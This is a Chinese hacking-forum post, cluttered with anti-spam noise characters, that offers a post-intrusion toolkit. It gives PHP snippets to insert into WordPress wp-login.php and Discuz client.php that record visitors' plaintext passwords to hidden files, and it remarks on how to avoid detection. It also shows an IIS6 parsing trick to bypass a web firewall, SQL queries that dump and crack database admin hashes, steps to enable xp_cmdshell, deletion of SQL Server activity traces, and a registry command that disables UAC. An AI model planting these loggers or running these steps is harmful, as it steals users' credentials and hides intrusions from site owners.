4 |5 Y6 Q; y/ [8 `* u$log_ip=$_SERVER["REMOTE_ADDR"];! n, H% h/ c; F# C/ V
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;0 ?# P+ [6 |- E* x8 R3 |$ z- k
$txt=$txt.”\r\n”;; r9 T- w4 g9 }" P
if($log_user&&$log_pwd&&$log_ip){
# O3 ~# J) G/ I' h5 _7 n* Z@fwrite(fopen(‘pwd.txt’,”a+”),$txt);1 V; E& M3 s2 {, \- t
}) O* m, A5 {2 S8 U0 E. g
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。. E/ |6 \8 A! v2 ~/ d3 Z
就是搜索case ‘login’
, a/ }3 K& g8 l5 T在它下面直接插入即可,记录的密码生成在pwd.txt中,) y0 Z! @* r$ K/ V, M
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
% R9 j& p: v) R利用II6文件解析漏洞绕过安全狗代码:
6 A9 A  p$ k( H- H;antian365.asp;antian365.jpg
* W8 E5 \  N) s' ~) {' B# F# _' O
各种类型数据库抓HASH破解最高权限密码!3 f# ]% Z( O* S# e! n9 @
1.sql server2000
0 }7 Y2 c5 j- d) U/ XSELECT password from master.dbo.sysxlogins where name='sa'
7 g& @5 ?( K6 m( K7 z0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341- W. y* R. ?' a6 ^5 D
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
' r! X- a- Z% B# ^: q
* N/ h8 `+ g1 B' H, m* K0×0100- constant header2 J4 U! I6 P5 D- A! a: }/ A
34767D5C- salt
% r7 h* a, z( N6 J( w0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
! k2 i7 @1 `- O( q3 L( D/ X' f2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash/ ~$ j1 E6 L; W. y3 y0 a
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash
; X7 O& F2 q* I4 ^, _0 z2 vSQL server 2005:-
# y" |) B% d& l" c2 _! GSELECT password_hash FROM sys.sql_logins where name='sa'
+ e; e( _/ X5 a* ^0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F  I6 v& g% V. O& j
0×0100- constant header; e9 m- }: I! a( f' C5 j
993BF231-salt& t/ y: ]5 i: g3 h/ B  U- b2 p! Q
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash) h* ]& K) M& ~/ n
crack case sensitive hash in cain, try brute force and dictionary based attacks.% F" {' z2 l0 Z7 M  L/ o; [

) f) w- Y$ W* L; |update:- following bernardo’s comments:-0 a+ r/ Y6 U# ~) x
use function fn_varbintohexstr() to cast password in a hex string.1 G6 P% o; R1 M9 B$ O5 y
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
/ p* s% L0 b* p, h9 ?; b1 S( l+ s$ R6 R# z( c
MYSQL:-7 M# T  ~1 Z2 _) k. I

  `3 h+ X4 X5 ~/ N9 f$ ]In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.9 D: Q  p. E1 |7 V2 i
/ L. a' Q& Z3 {5 P2 T
*mysql  < 4.1
: ]; F# t2 F) N
9 x" |/ ]0 _9 f' T. Cmysql> SELECT PASSWORD(‘mypass’);# S2 ]& _' R; x5 u6 \1 S
+——————–+
  e4 i" m6 R9 D" c! r$ `. E2 e4 B# H. [| PASSWORD(‘mypass’) |
- Z4 u8 B2 `) \! \# c' u: o+——————–+6 s1 i8 j; e+ v. ~2 P) i; R
| 6f8c114b58f2ce9e   |" m( {+ |" f1 e
+——————–+
7 m0 p, n0 G  x( J2 y* x1 s' V, V! S, N. O( i$ B6 `
*mysql >=4.1
+ h: j: r* Q$ B2 t
$ x/ s* ]4 V+ c5 G3 n0 Lmysql> SELECT PASSWORD(‘mypass’);
+ F$ k8 f$ u2 g' Q% ]+——————————————-+. }! D1 k0 J: E# @0 g
| PASSWORD(‘mypass’)                        |/ X; _2 k% z# E/ A4 |
+——————————————-+- Y5 \7 j  D4 T- d& G( C# Q1 ~. P
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
; g# }. u( a0 f7 k0 [1 q6 Y& j2 x+——————————————-+7 A7 U1 s2 ~, T1 {

' r6 `' Z* f  S( e4 h; J: VSelect user, password from mysql.user
2 V7 L1 D7 K( L' C  I* gThe hashes can be cracked in ‘cain and abel’7 p- q# H1 t1 @- p: E% D9 j

3 J6 |- ~' ?0 p2 |Postgres:-
+ E+ c5 o+ C! ~- V  c, |% lPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
! c+ u1 \5 \' p4 j, tselect usename, passwd from pg_shadow;
' Q8 h5 D6 D6 O6 w3 p( k9 y7 T' ausename      |  passwd/ z$ S% J9 `" s0 Z6 K- ?- c. B. R
——————+————————————-
" Q7 u& @/ ~$ \$ [9 H8 ntestuser            | md5fabb6d7172aadfda4753bf0507ed4396
. T& k% `% \, t! `% |  ?) Uuse mdcrack to crack these hashes:-
7 h7 b, m0 @7 @8 p5 O2 r( I& t! v  @$ [$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396% R# ?! a+ C3 O2 J5 m
; Z, {1 h/ ?2 A- Z9 k  v; m
Oracle:-2 K) m7 l( k. L' B! T
select name, password, spare4 from sys.user$, K; U9 t- M1 d, ]' ?
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g; w. G- `" R/ o; R5 S7 {6 @% N
More on Oracle later, i am a bit bored….$ U# z* y% M0 ~, k8 [4 e0 A
4 q4 {2 [, p+ A% P" [6 _( A

8 P. n+ n6 {5 y  h# @3 l' T在sql server2005/2008中开启xp_cmdshell. |- O- D# n9 ~+ K+ n0 {
-- To allow advanced options to be changed.- |: r2 B5 Y. @( c
EXEC sp_configure 'show advanced options', 1
! N- ^; c" a. J- B7 N4 E5 r3 qGO
+ A5 D  b/ F$ E3 ^& J& S-- To update the currently configured value for advanced options.6 `% ]1 J0 w- R$ ^, y8 @2 Y! W" D
RECONFIGURE
% S( i  F" S& F% j0 w1 cGO
0 j7 }5 p6 `, W( M% h-- To enable the feature.
) |! F* [8 C# IEXEC sp_configure 'xp_cmdshell', 1
' R( K' ^" K- O$ P7 lGO
$ S9 d- b& `- J" z$ ?-- To update the currently configured value for this feature.- M( q3 }. i8 V& G2 ?( t9 Q4 z
RECONFIGURE6 X2 h4 a! b( ^+ D
GO
4 U) h2 J2 s. i" Z. E3 ^SQL 2008 server日志清除,在清楚前一定要备份。
3 A- f0 n9 m, t7 p+ c6 I如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
9 v5 h# ?: M0 ]/ gX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
4 G  A! e+ l+ m0 Q
( P" u& ]/ s6 Y$ I% P对于SQL Server 2008以前的版本:/ V$ c3 x- T5 ~
SQL Server 2005:
' {% S8 S- M$ b" t( L0 @% k删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat. A4 T- [- J$ }: S6 `" f7 D
SQL Server 2000:
, I6 g1 }* x8 s# s! X' m2 k清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft  SQL  Server\80\Tools\Client\PrefServers\相应的内容即可。0 r& R9 _, q/ g% d  p! ^

/ X  a3 Z4 i6 d5 f6 G1 X本帖最后由 simeon 于 2013-1-3 09:51 编辑
3 r3 X  S5 G& D6 F
  v( ]9 ~$ D! l) z8 a) h4 a9 O  B6 a. }# e( E# i5 P
windows 2008 文件权限修改
% v5 B) B. z( i* z1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx# w' L8 ]7 j1 X7 {3 @1 y. g
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98' u% L) I$ b4 q, ]
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
6 D# C, u- n2 x+ {' a8 F5 ]
6 O- _. Y5 t, G6 a6 qWindows Registry Editor Version 5.00- b6 D% E$ K" W: k
[HKEY_CLASSES_ROOT\*\shell\runas]
& c) x! R: Q" k$ a@="管理员取得所有权"
7 a. Z3 Y3 N9 l"NoWorkingDirectory"=""
, w/ o3 u/ T+ X# k, ]5 ^[HKEY_CLASSES_ROOT\*\shell\runas\command]
/ _: N/ [# E- P@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
4 N/ W. q5 b& Q. u0 t: ]"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"$ P9 M) e6 y2 i5 R5 H$ e& W
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
  T0 _% m; q' x! Z@="管理员取得所有权"6 f, W: ^3 O% P. s' B  @
"NoWorkingDirectory"="": T5 t. @8 z  T4 K/ i
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
$ @7 t. N' w3 Q' `@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"# v9 R1 _+ M8 j$ {' M' ^
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"0 K! x' m6 h: w& I( |
7 W' Y( V+ \0 h
[HKEY_CLASSES_ROOT\Directory\shell\runas]: Z! k# \7 @  ]' M6 k+ P3 [* @
@="管理员取得所有权"
$ ~% ^! b7 z: s# W0 w"NoWorkingDirectory"=""
+ d" Z, ]+ f) a  ?3 E2 r9 A" S[HKEY_CLASSES_ROOT\Directory\shell\runas\command]' J  D4 @3 {- K4 [0 S+ ^) A4 |
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
$ z, [2 r2 S6 M! g# i"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"( k2 s, D6 v+ P& ]" I
# @0 O; Y) M1 Y

0 D. U% U" S. n* M! fwin7右键“管理员取得所有权”.reg导入
: Z7 `' m9 Q" D4 {. O: a7 D二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
+ I2 k2 L9 w& I7 _1、C:\Windows这个路径的“notepad.exe”不需要替换
) U" K. T/ n+ j$ j7 F- m' J2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
7 S( p6 K: i% }, Y3、四个“notepad.exe.mui”不要管
; W, v, O& l  b# E% s$ L4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
) i" x+ n7 _# d4 sC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”; n4 \  @& m; Y4 B7 r: d6 g
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
+ R4 \7 \" O. ~8 T  i' T9 t替换完之后回到桌面,新建一个txt文档打开看看是不是变了。3 p) u! p) E" @9 e7 O9 H3 m
windows 2008中关闭安全策略: 5 t) s( T/ `' ?9 l( S5 |- @& z
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
" L& ]3 q0 z3 ~3 d修改uc_client目录下的client.php 在
, N& B  O3 Y3 c! S' mfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {5 d! x! Q  E0 w, }. }! C' X
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
; [: t: x3 F4 N5 a& P5 |; W你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
* r8 q; D+ [, v5 `if(getenv('HTTP_CLIENT_IP')) {
( `6 s% j# T0 \: R  Z, x$onlineip = getenv('HTTP_CLIENT_IP');! S2 I! E- Q* B; F4 j, g+ [
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {8 O4 u+ P" D! ]# |: ]" X
$onlineip = getenv('HTTP_X_FORWARDED_FOR');! M" w5 o% n" n) Z9 w1 n
} elseif(getenv('REMOTE_ADDR')) {. }8 Q1 g# I  x
$onlineip = getenv('REMOTE_ADDR');& {/ x% V( m9 p+ S- X
} else {% H: _( @5 j6 S: ]6 S) r+ V
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
+ O# L8 S, C& ]9 e! o% s6 D  _1 N}
( W2 F+ J  t" z! C5 k) @     $showtime=date("Y-m-d H:i:s");
8 l4 I) F2 l2 q, @, k4 T    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";/ j, X& X. X% H, @
    $handle=fopen('./data/cache/csslog.php','a+');( W, j* T+ T5 x% d1 Q4 b- \6 ]3 x
    $write=fwrite($handle,$record);
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表